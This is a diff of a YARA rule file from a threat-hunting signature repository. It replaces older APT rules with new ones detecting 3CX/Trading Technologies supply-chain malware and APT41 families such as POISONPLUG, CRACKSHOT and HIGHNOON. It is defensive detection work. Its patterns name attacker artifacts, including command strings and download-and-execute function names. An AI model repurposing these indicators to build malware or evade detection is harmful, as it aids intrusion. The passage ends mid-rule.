+		disclaimer = "This rule is meant for hunting and is not tested to run in a production environment"
+		hash1 = "6727284586ecf528240be21bb6e97f88"
 
 	strings:
-		$a1 = "AuthenticateNetUseIpc"
-		$a2 = "Failed to authenticate to"
-		$a3 = "Failed to disconnect from"
-		$a4 = "%S\\ipc$" wide
-		$a5 = "Not deleting..."
-		$a6 = "CopyServiceToRemoteMachine"
-		$a7 = "DH Exchange failed"
-		$a8 = "ConnectToNamedPipes"
+		$sb1 = { 48 8D 15 [4] 48 8D 4C 24 4C E8 [4] 85 C0 74 ?? 48 8D 15 [4] 48 8D 4C 24 4C E8 [4] 85 C0 74 ?? 48 8D 15 [4] 48 8D 4C 24 4C E8 [4] 85 C0 74 ?? 48 8D [3] 48 8B CB FF 15 [4] EB }
+		$ss1 = "chrome.exe" wide fullword
+		$ss2 = "firefox.exe" wide fullword
+		$ss3 = "msedge.exe" wide fullword
+		$ss4 = "\\\\.\\pipe\\*" ascii fullword
+		$ss5 = "FindFirstFileA" ascii fullword
+		$ss6 = "Process32FirstW" ascii fullword
+		$ss7 = "RtlAdjustPrivilege" ascii fullword
+		$ss8 = "GetCurrentProcess" ascii fullword
+		$ss9 = "NtWaitForSingleObject" ascii fullword
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of ( $a* )
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
 }
-rule SIGNATURE_BASE_Regin_Related_Malware
+rule SIGNATURE_BASE_APT_NK_MAL_M_Hunting_VEILEDSIGNAL_6 : FILE
 {
 	meta:
-		description = "Malware Sample - maybe Regin related"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9377dd52-244f-5289-a2a3-88b6377b2dd2"
-		date = "2015-06-03"
-		modified = "2024-04-24"
-		reference = "VT Analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/spy_regin_fiveeyes.yar#L344-L367"
+		description = "Detects VEILEDSIGNAL malware"
+		author = "Mandiant"
+		id = "2cbedbc0-d465-5674-bf9c-9362003eb8d2"
+		date = "2023-04-20"
+		modified = "2023-12-05"
+		reference = "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_tradingtech_apr23.yar#L145-L164"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "76c355bfeb859a347e38da89e3d30a6ff1f94229"
-		logic_hash = "61ce7a69ab357740158e355455362a4f5fddc67ee60af120733f509e7407216f"
-		score = 70
+		logic_hash = "d3b1e5f7a6b73fc4cdc5abe19a412130cde33c2d52c0ad78256b865e018e3794"
+		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		disclaimer = "This rule is meant for hunting and is not tested to run in a production environment"
+		hash1 = "00a43d64f9b5187a1e1f922b99b09b77"
 
 	strings:
-		$s1 = "%c%s%c -p %d -e %d -pv -c \"~~[%x] s; .%c%c%s %s /u %s_%d.dmp; q\"" fullword wide
-		$s0 = "Software\\Microsoft\\Windows NT\\CurrentVersion\\HotFix" fullword wide
-		$s2 = "%x:%x:%x:%x:%x:%x:%x:%x%c" fullword ascii
-		$s3 = "disp.dll" fullword ascii
-		$s4 = "msvcrtd.dll" fullword ascii
-		$s5 = "%d.%d.%d.%d%c" fullword ascii
-		$s6 = "%ls_%08x" fullword wide
-		$s8 = "d%ls%ls" fullword wide
-		$s9 = "Memory location: 0x%p, size 0x%08x" fullword wide
+		$ss1 = "C:\\Programdata\\" wide
+		$ss2 = "devobj.dll" wide fullword
+		$ss3 = "msvcr100.dll" wide fullword
+		$ss4 = "TpmVscMgrSvr.exe" wide fullword
+		$ss5 = "\\Microsoft\\Windows\\TPM" wide fullword
+		$ss6 = "CreateFileW" ascii fullword
 
 	condition:
-		$s1 or 3 of ( $s* )
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and all of them
 }
-rule SIGNATURE_BASE_Streamex_Shellcrew
+rule SIGNATURE_BASE_SUSP_NK_MAL_M_Hunting_POOLRAT
 {
 	meta:
-		description = "Detects a "
-		author = "Cylance"
-		id = "217077bb-71b7-5cbf-8adf-68a16688c415"
-		date = "2017-02-09"
+		description = "Detects strings found in POOLRAT malware"
+		author = "Mandiant"
+		id = "70f5f3a0-0fd0-54dc-97cc-4f3c35f02fcd"
+		date = "2023-04-20"
 		modified = "2023-12-05"
-		reference = "https://blog.cylance.com/shell-crew-variants-continue-to-fly-under-big-avs-radar"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_shellcrew_streamex.yar#L11-L29"
+		old_rule_name = "APT_NK_MAL_M_Hunting_POOLRAT"
+		reference = "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_tradingtech_apr23.yar#L166-L202"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a82ff51c1dcd1ebe3d7acc96b46b0b79dcead9146204f060f5413c4c7b5286d3"
-		score = 80
-		quality = 85
+		logic_hash = "ac8db844a9c4ed961930417809afb706ea948c4509a4be1eaeed77f09c86069d"
+		score = 70
+		quality = 83
 		tags = ""
+		disclaimer = "This rule is meant for hunting and is not tested to run in a production environment"
+		hash1 = "451c23709ecd5a8461ad060f6346930c"
 
 	strings:
-		$a = "0r+8DQY97XGB5iZ4Vf3KsEt61HLoTOuIqJPp2AlncRCgSxUWyebhMdmzvFjNwka="
-		$b = {34 ?? 88 04 11 48 63 C3 48 FF C1 48 3D D8 03 00 00}
-		$bb = {81 86 ?? ?? 00 10 34 ?? 88 86 ?? ?? 00 10 46 81 FE D8 03 00 00}
-		$c = "greendll"
-		$d = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" wide
-		$f = {26 5E 25 24 23 91 91 91 91}
-		$g = "D:\\pdb\\ht_d6.pdb"
+		$s1 = "name=\"uid\"%s%s%u%s" ascii wide
+		$s2 = "name=\"session\"%s%s%u%s" ascii wide
+		$s3 = "name=\"action\"%s%s%s%s" ascii wide
+		$s4 = "name=\"token\"%s%s%u%s" ascii wide
+		$str1 = "--N9dLfqxHNUUw8qaUPqggVTpX-" wide ascii nocase
 
 	condition:
-		$a or $b or $bb or ( $c and $d ) or $f or $g
+		any of ( $s* ) or $str1
 }
-rule SIGNATURE_BASE_Shellcrew_Streamex_1 : FILE
+rule SIGNATURE_BASE_APT_NK_Tradingtech_Forensicartifacts_Apr23_1 : FILE
 {
 	meta:
-		description = "Auto-generated rule"
-		author = "Florian Roth (Nextron Systems)"
-		id = "26b4cac0-3f2b-5637-86f5-16b7f8afa0e6"
-		date = "2017-02-10"
-		modified = "2022-12-21"
-		reference = "https://blog.cylance.com/shell-crew-variants-continue-to-fly-under-big-avs-radar"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_shellcrew_streamex.yar#L40-L59"
+		description = "Detects forensic artifacts, file names and keywords related the Trading Technologies compromise UNC4736"
+		author = "Florian Roth"
+		id = "f79a5321-4f22-52d9-aa83-4aa750ecc036"
+		date = "2023-04-20"
+		modified = "2023-04-21"
+		reference = "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_tradingtech_apr23.yar#L204-L225"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4da0b8843de87e53243af40700afaab77120531af28dc311d9100bce6721650b"
-		score = 75
+		logic_hash = "50329427e56b70335a12f0dde87a36ac95838377482eebab334d252332fe481b"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "81f411415aefa5ad7f7ed2365d9a18d0faf33738617afc19215b69c23f212c07"
 
 	strings:
-		$x1 = "cmd.exe /c  \"%s\"" fullword wide
-		$s3 = "uac\\bin\\install_test.pdb" ascii
-		$s5 = "uncompress error:%d %s" fullword ascii
-		$s7 = "%s\\AdobeBak\\Proc.dat" fullword wide
-		$s8 = "e:\\workspace\\boar" fullword ascii
-		$s12 = "$\\data.ini" fullword wide
+		$x1 = "www.tradingtechnologies.com/trading/order-management" ascii wide
+		$xf1 = "X_TRADER_r7.17.90p608.exe" ascii wide
+		$xf2 = "\\X_TRADER-ja.mst" ascii wide
+		$xf3 = "C:\\Programdata\\TPM\\TpmVscMgrSvr.exe" ascii wide
+		$xf4 = "C:\\Programdata\\TPM\\winscard.dll" ascii wide
+		$fp1 = "<html"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and 4 of them )
+		not uint16( 0 ) == 0x5025 and 1 of ( $x* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_Shellcrew_Streamex_1_Msi : FILE
+
+rule SIGNATURE_BASE_SUSP_TH_APT_UNC4736_Tradingtech_Cert_Apr23_1
 {
 	meta:
-		description = "Auto-generated rule"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8cf5dad5-0737-56bf-8cef-7bcf7e7e5a78"
-		date = "2017-02-10"
+		description = "Threat hunting rule that detects samples signed with the compromised Trading Technologies certificate after May 2022"
+		author = "Florian Roth"
+		id = "9a05fba9-9466-5b69-9207-27ad01d6eb8b"
+		date = "2023-04-20"
 		modified = "2023-12-05"
-		reference = "https://blog.cylance.com/shell-crew-variants-continue-to-fly-under-big-avs-radar"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_shellcrew_streamex.yar#L61-L80"
+		reference = "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_tradingtech_apr23.yar#L227-L242"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fa853dac58c067a88f1784ac4017fd558151e54ed10ceb32ab90c99e970460fe"
-		score = 75
+		logic_hash = "47941828b3c18ed39eddacbc73e147651a9bd48e1a0f7b9847ff1d4c6fea6afd"
+		score = 65
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8c9048e2f5ea2ef9516cac06dc0fba8a7e97754468c0d9dc1e5f7bce6dbda2cc"
+		tags = ""
 
 	strings:
-		$x1 = "msi.dll.eng" fullword wide
-		$s2 = "ahinovx" fullword ascii
-		$s3 = "jkpsxy47CDEMNSTYbhinqrwx56" fullword ascii
-		$s4 = "PVYdejmrsy12" fullword ascii
-		$s6 = "FLMTUZaijkpsxy45CD" fullword ascii
-		$s7 = "afhopqvw34ABIJOPTYZehmo" fullword ascii
+		$s1 = { 00 85 38 A6 C5 01 8F 50 FC }
+		$s2 = "Go Daddy Secure Certificate Authority - G2"
+		$s3 = "Trading Technologies International, Inc"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 20KB and 3 of them )
+		pe.timestamp> 1651363200 and all of them
 }
-rule SIGNATURE_BASE_Shellcrew_Streamex_1_Msi_Dll : FILE
+rule SIGNATURE_BASE_APT_APT41_POISONPLUG_3 : FILE
 {
 	meta:
-		description = "Auto-generated rule"
+		description = "Detects APT41 malware POISONPLUG"
 		author = "Florian Roth (Nextron Systems)"
-		id = "56586e0b-010a-5ad5-8822-5d370475aa06"
-		date = "2017-02-10"
+		id = "e150dd69-c611-53de-9c7d-de28d3a208dc"
+		date = "2019-08-07"
 		modified = "2023-12-05"
-		reference = "https://blog.cylance.com/shell-crew-variants-continue-to-fly-under-big-avs-radar"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_shellcrew_streamex.yar#L82-L98"
+		reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt41.yar#L14-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "087ac07a2bf822f7838ef46296150381cfc9af9b12b4023654023a779efc1db1"
-		score = 75
+		logic_hash = "b74b89ac382b2b839c169cd1388d86888172f133091afd079ec42c9380935fdc"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "883108119d2f4db066fa82e37aa49ecd2dbdacda67eb936b96720663ed6565ce"
-		hash2 = "5311f862d7c824d13eea8293422211e94fb406d95af0ae51358accd4835aaef8"
-		hash3 = "191cbeffa36657ab1ef3939da023cacbc9de0285bbe7775069c3d6e18b372c3f"
+		hash1 = "70c03ce5c80aca2d35a5555b0532eedede24d4cc6bdb32a2c8f7e630bba5f26e"
 
 	strings:
-		$s1 = "NDOGDUA" fullword ascii
-		$s2 = "NsrdsrN" fullword ascii
+		$s1 = "Rundll32.exe \"%s\", DisPlay 64" fullword ascii
+		$s2 = "tcpview.exe" fullword ascii
+		$s3 = "nuR\\noisreVtnerruC\\swodniW\\tfosorciM\\erawtfoS" fullword ascii
+		$s4 = "AxEeulaVteSgeR" fullword ascii
+		$s5 = "%04d-%02d-%02d_%02d-%02d-%02d.dmp" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x4d9d and filesize < 300KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 900KB and 3 of them
 }
-rule SIGNATURE_BASE_SUSP_Themebleed_Theme_Sep23 : FILE
+
+rule SIGNATURE_BASE_APT_APT41_POISONPLUG_SHADOW : FILE
 {
 	meta:
-		description = "Detects domain or IP placement in Windows theme files"
-		author = "@m_haggis, @nas_bench"
-		id = "76d0042b-655d-5d03-bcc4-150ebc92eb43"
-		date = "2023-09-13"
+		description = "Detects APT41 malware POISONPLUG SHADOW"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e150dd69-c611-53de-9c7d-de28d3a208dc"
+		date = "2019-08-07"
 		modified = "2023-12-05"
-		reference = "https://github.com/gabe-k/themebleed"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_cve_2023_38146.yar#L1-L17"
+		reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt41.yar#L33-L44"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "577003741f07aeffafd2b0b22913de44ea4f5ed264f4104ee013104355f65311"
-		score = 75
-		quality = 60
+		logic_hash = "fc923c7e85f3870e08a077b344e575d3c349fa02f3d218a9a7ec31992f14866b"
+		score = 85
+		quality = 85
 		tags = "FILE"
-
-	strings:
-		$s1 = /Path=\\\\[0-9a-zA-Z\.-]{1,20}\\/
-		$s2 = "[VisualStyles]"
-		$s3 = "[Theme]"
+		hash1 = "462a02a8094e833fd456baf0a6d4e18bb7dab1a9f74d5f163a8334921a4ffde8"
 
 	condition:
-		filesize < 1MB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and pe.imphash ( ) == "c67de089f2009b21715744762fc484e8"
 }
-rule SIGNATURE_BASE_APT_KE3CHANG_TMPFILE : APT KE3CHANG TMPFILE FILE
+rule SIGNATURE_BASE_APT_APT41_CRACKSHOT : FILE
 {
 	meta:
-		description = "Detects Strings left in TMP Files created by K3CHANG Backdoor Ketrican"
-		author = "Markus Neis, Swisscom"
-		id = "84d411af-ea3d-5862-8c2f-7caca60c1b66"
-		date = "2020-06-18"
+		description = "Detects APT41 malware CRACKSHOT"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4ec34a77-dc7f-5f27-9f0a-c98438389018"
+		date = "2019-08-07"
 		modified = "2023-12-05"
-		reference = "https://app.any.run/tasks/a96f4f9d-c27d-490b-b5d3-e3be0a1c93e9/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ke3chang.yar#L1-L21"
+		reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt41.yar#L46-L64"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "75c97fe2eeb82e09f52e98d76bd529824f171da4c802b5febc1036314d8145f0"
-		score = 75
+		logic_hash = "70dd9edfc7f9ace7b00a35eb2ef664aa4fbaab8e2d268922d1593074897e769c"
+		score = 85
 		quality = 85
-		tags = "APT, KE3CHANG, TMPFILE, FILE"
-		hash1 = "4ef11e84d5203c0c425d1a76d4bf579883d40577c2e781cdccc2cc4c8a8d346f"
+		tags = "FILE"
+		hash1 = "993d14d00b1463519fea78ca65d8529663f487cd76b67b3fd35440bcdf7a8e31"
 
 	strings:
-		$pps1 = "PSParentPath             : Microsoft.PowerShell.Core\\Registry::HKEY_CURRENT_USE" fullword ascii
-		$pps2 = "PSPath                   : Microsoft.PowerShell.Core\\Registry::HKEY_CURRENT_USE" fullword ascii
-		$psp1 = ": Microsoft.PowerShell.Core\\Registry" ascii
-		$s4 = "PSChildName  : PhishingFilter" fullword ascii
-		$s1 = "DisableFirstRunCustomize : 2" fullword ascii
-		$s7 = "PSChildName  : 3" fullword ascii
-		$s8 = "2500         : 3" fullword ascii
+		$x1 = ";procmon64.exe;netmon.exe;tcpview.exe;MiniSniffer.exe;smsniff.exe" ascii
+		$s1 = "RunUrlBinInMem" fullword ascii
+		$s2 = "DownRunUrlFile" fullword ascii
+		$s3 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36" fullword ascii
+		$s4 = "%s|%s|%s|%s|%s|%s|%s|%dx%d|%04x|%08X|%s|%s" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5350 and filesize < 1KB and $psp1 and 1 of ( $pps* ) and 1 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 250KB and ( 1 of ( $x* ) or 2 of them )
 }
-rule SIGNATURE_BASE_APT_MAL_Ke3Chang_Ketrican_Jun20_1 : FILE
+rule SIGNATURE_BASE_APT_APT41_POISONPLUG_2 : FILE
 {
 	meta:
-		description = "Detects Ketrican malware"
+		description = "Detects APT41 malware POISONPLUG"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ccd8322e-c822-512a-9ac5-eabc9d09640b"
-		date = "2020-06-18"
+		id = "e150dd69-c611-53de-9c7d-de28d3a208dc"
+		date = "2019-08-07"
 		modified = "2023-12-05"
-		reference = "BfV Cyber-Brief Nr. 01/2020"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ke3chang.yar#L23-L42"
+		reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt41.yar#L66-L82"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a2806de18432dbab24f08c7c2863fd694c91192cf7df4388dfeb87b237f22257"
-		score = 75
+		logic_hash = "f2ec2e91edaaf976169b1fa6645aeae75135e5d5f522e0fda2438f84d674f383"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "02ea0bc17875ab403c05b50205389065283c59e01de55e68cee4cf340ecea046"
-		hash2 = "f3efa600b2fa1c3c85f904a300fec56104d2caaabbb39a50a28f60e0fdb1df39"
+		hash1 = "0055dfaccc952c99b1171ce431a02abfce5c6f8fb5dc39e4019b624a7d03bfcb"
 
 	strings:
-		$xc1 = { 00 59 89 85 D4 FB FF FF 8B 85 D4 FB FF FF 89 45
-               FC 68 E0 58 40 00 8F 45 FC E9 }
-		$op1 = { 6a 53 58 66 89 85 24 ff ff ff 6a 79 58 66 89 85 }
-		$op2 = { 8d 45 bc 50 53 53 6a 1c 8d 85 10 ff ff ff 50 ff }
+		$s1 = "ma_lockdown_service.dll" fullword wide
+		$s2 = "acbde.dll" fullword ascii
+		$s3 = "MA lockdown Service" fullword wide
+		$s4 = "McAfee Agent" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of ( $x* ) or 2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 11000KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_EXPL_WIN_PS1_Badsuccessor_May25 : FILE
+
+rule SIGNATURE_BASE_APT_APT41_POISONPLUG : FILE
 {
 	meta:
-		description = "Detects PowerShell tool called Get-BadSuccessorOUPermissions.ps1 that helps exploit a vulnerability in Active Directory. Lists every principal that can perform a BadSuccessor attack and the OUs where it holds the required permissions."
-		author = "Florian Roth"
-		id = "5bc135f2-dc7f-51e9-ba19-b63af64f0deb"
-		date = "2025-05-22"
-		modified = "2025-05-22"
-		reference = "https://www.akamai.com/blog/security-research/abusing-dmsa-for-privilege-escalation-in-active-directory"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/hktl_badsuccessor_helper_may25.yar#L2-L15"
+		description = "Detects APT41 malware POISONPLUG"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e150dd69-c611-53de-9c7d-de28d3a208dc"
+		date = "2019-08-07"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt41.yar#L84-L106"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a023bced4aec2b2c601088367766f42a3fcf36053c7eb92985cc7468c7cd6cb0"
-		score = 75
+		logic_hash = "34459c2a8a13b8084c93a640723a3e2b67d2f695ff84ab63f4e313cacc458f32"
+		score = 80
 		quality = 85
 		tags = "FILE"
+		hash1 = "2eea29d83f485897e2bac9501ef000cc266ffe10019d8c529555a3435ac4aabd"
+		hash2 = "5d971ed3947597fbb7e51d806647b37d64d9fe915b35c7c9eaf79a37b82dab90"
+		hash3 = "f4d57acde4bc546a10cd199c70cdad09f576fdfe66a36b08a00c19ff6ae19661"
+		hash4 = "3e6c4e97cc09d0432fbbbf3f3e424d4aa967d3073b6002305cd6573c47f0341f"
 
 	strings:
-		$x1 = "function Get-BadSuccessorOUPermissions" ascii wide
-		$x2 = "\"0feb936f-47b3-49f2-9386-1dedc2c23765\"=\"msDS-DelegatedManagedServiceAccount\"" ascii wide
-		$x3 = "CreateChild|GenericAll|WriteDACL|WriteOwner" ascii wide
+		$s1 = "TSMSISrv.DLL" fullword wide
+		$s2 = "[-]write failed[%d]" fullword ascii
+		$s3 = "[-]load failed" fullword ascii
+		$s4 = "Remote Desktop Services" fullword wide
 
 	condition:
-		filesize < 20MB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 10000KB and ( pe.imphash ( ) == "1b074ef7a1c0888ef31337c8ad2f2e0a" or 2 of them )
 }
-rule SIGNATURE_BASE_LOG_APT_WEBSHELL_Solarwinds_SUNBURST_Report_Webshell_Dec20_2
+rule SIGNATURE_BASE_APT_APT41_HIGHNOON : FILE
 {
 	meta:
-		description = "Detects webshell access mentioned in FireEye's SUNBURST report"
+		description = "Detects APT41 malware HIGHNOON"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fb86164d-13de-5357-8f52-c597b51127ff"
-		date = "2020-12-21"
+		id = "6611fb04-7237-52d1-b29f-941c3853aeca"
+		date = "2019-08-07"
 		modified = "2023-12-05"
-		reference = "https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_solarwinds_susp_sunburst.yar#L21-L32"
+		reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt41.yar#L108-L135"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ec52e244a483ace0f6932b553b159b23b767c00d1f64a4711e5f359832e846f5"
-		score = 75
-		quality = 60
-		tags = ""
+		logic_hash = "c8afa91f90157c3ac0f7954cd2d42022392c4e6f039d88d1dd4bace19028c2b1"
+		score = 85
+		quality = 85
+		tags = "FILE"
+		hash1 = "63e8ed9692810d562adb80f27bb1aeaf48849e468bf5fd157bc83ca83139b6d7"
+		hash2 = "4aa6970cac04ace4a930de67d4c18106cf4004ba66670cfcdaa77a4c4821a213"
 
 	strings:
-		$xr1 = /logoimagehandler.ashx[^\n\s]{1,400}clazz=/ ascii wide
+		$x1 = "workdll64.dll" fullword ascii
+		$s1 = "\\Fonts\\Error.log" ascii
+		$s2 = "[%d/%d/%d/%d:%d:%d]" fullword ascii
+		$s3 = "work_end" fullword ascii
+		$s4 = "work_start" fullword ascii
+		$s5 = "\\svchost.exe" ascii
+		$s6 = "LoadAppInit_DLLs" fullword ascii
+		$s7 = "netsvcs" fullword ascii
+		$s8 = "HookAPIs ...PID %d " fullword ascii
+		$s9 = "SOFTWARE\\Microsoft\\HTMLHelp" fullword ascii
+		$s0 = "DllMain_mem" fullword ascii
+		$s10 = "%s\\NtKlRes.dat" fullword ascii
+		$s11 = "Global\\%s-%d" fullword ascii
 
 	condition:
-		$xr1
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and ( 1 of ( $x* ) or 4 of them )
 }
-rule SIGNATURE_BASE_Malware_Sakula_Xorloop : FILE
+
+rule SIGNATURE_BASE_APT_APT41_HIGHNOON_2 : FILE
 {
 	meta:
-		description = "XOR loops from Sakula malware"
-		author = "David Cannings"
-		id = "9349b7e4-560c-5d8b-94d9-cbb9fd09e132"
-		date = "2016-06-13"
-		modified = "2023-01-27"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sakula.yar#L1-L18"
+		description = "Detects APT41 malware HIGHNOON"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1e48d859-2da9-583e-80e5-8d59054cfb85"
+		date = "2019-08-07"
+		modified = "2023-12-05"
+		reference = "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt41.yar#L137-L157"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "fc6497fe708dbda9355139721b6181e7"
-		logic_hash = "b3c3131693e18ce2cf26786a93b61d39d90703d8c827de1340f85377fe7b59de"
+		logic_hash = "dc35b78df1631b1c9650de2bac625a7bc629225f36fe5e32fbff829cb77dc9ac"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		hash1 = "79190925bd1c3fae65b0d11db40ac8e61fb9326ccfed9b7e09084b891089602d"
 
 	strings:
-		$opcodes_decode_loop01 = { 31 C0 8A 04 0B 3C 00 74 09 38 D0 74 05 30 D0 88 04 0B }
-		$opcodes_decode_loop02 = { 8B 45 08 8D 0C 02 8A 01 84 C0 74 08 3C ?? 74 04 34 ?? 88 01 }
+		$x1 = "H:\\RBDoor\\" ascii
+		$s1 = "PlusDll.dll" fullword ascii
+		$s2 = "ShutDownEvent.dll" fullword ascii
+		$s3 = "\\svchost.exe" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of ( $opcodes* )
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and ( pe.imphash ( ) == "b70358b00dd0138566ac940d0da26a03" or pe.exports ( "DllMain_mem" ) or $x1 or 3 of them )
 }
-rule SIGNATURE_BASE_Malware_Sakula_Memory
+
+rule SIGNATURE_BASE_APT_APT41_HIGHNOON_BIN : FILE
 {
 	meta:
-		description = "Sakula malware - strings after unpacking (memory rule)"
-		author = "David Cannings"
-		id = "328e3707-d11d-5b7f-bec4-18a42a2c658b"
-		date = "2023-12-05"
+		description = "Detects APT41 malware HIGHNOON.BIN"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c8bd62b4-b882-5c04-aace-76dd4a21a784"
+		date = "2019-08-07"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
